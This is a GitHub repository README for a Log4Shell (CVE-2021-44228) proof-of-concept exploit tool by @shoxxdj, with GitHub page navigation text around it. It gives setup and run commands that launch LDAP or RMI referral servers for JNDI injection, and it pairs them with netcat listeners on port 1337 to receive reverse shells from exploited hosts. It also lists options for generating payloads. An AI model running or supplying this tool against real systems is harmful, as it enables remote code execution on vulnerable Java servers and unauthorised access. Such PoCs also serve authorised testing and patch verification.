Log4shell POC

[!] CVE: CVE-2021-44228

[!] Based on https://github.com/kozmer/log4j-shell-poc

[!] And https://www.veracode.com/blog/research/exploiting-jndi-injections-java

[!] And https://github.com/cyberxml/log4j-poc

[!] But with poetry and simple to run :) by @shoxxdj

Usage :

First time, run the run_me_first.sh script.

./run_me_first.sh
poetry install
poetry run log4shell --userip listenerIP --lport netcatPort

Options :

Log4Shell Exploit Tool

options:
  -h, --help         show this help message and exit
  --userip USERIP    Enter IP for LDAPRefServer & Shell
  --webport WEBPORT  listener port for HTTP port
  --rmiport RMIPORT  listener port for RMI server
  --lport LPORT      Netcat Port
  --ljava LJAVA      Local Java Binaries Location
  --gen GEN          Generate multiple payloads
  --method METHOD    LDAP or RMI or all
  --references       Print references

Examples :

Ldap server

Shell1:
  poetry run log4shell --userip X.X.X.X --lport 1337 --method ldap
Shell2:
 nc -lvp 1337

Rmi server

Shell1:
 poetry run log4shell --userip 192.168.1.65 --lport 1337 --method rmi
Shell2:
 nc -lvp 1337

Rmi with custom port:

Shell1:
 poetry run log4shell --userip 192.168.1.65 --lport 1337 --rmiport 7777 --method rmi
Shell2:
 nc -lvp 1337

Name		Name	Last commit message	Last commit date
Latest commit History 13 Commits
log4shell		log4shell
tests		tests
.gitignore		.gitignore
README.md		README.md
pyproject.toml		pyproject.toml
run_me_first.sh		run_me_first.sh

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

Log4shell POC

Usage :

Examples :

About

Uh oh!

Releases

Packages

Contributors 2

Uh oh!

Languages

shoxxdj/log4shellExploit

Folders and files

Latest commit

History

Repository files navigation

Log4shell POC

Usage :

Examples :

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Contributors 2

Uh oh!

Languages

Packages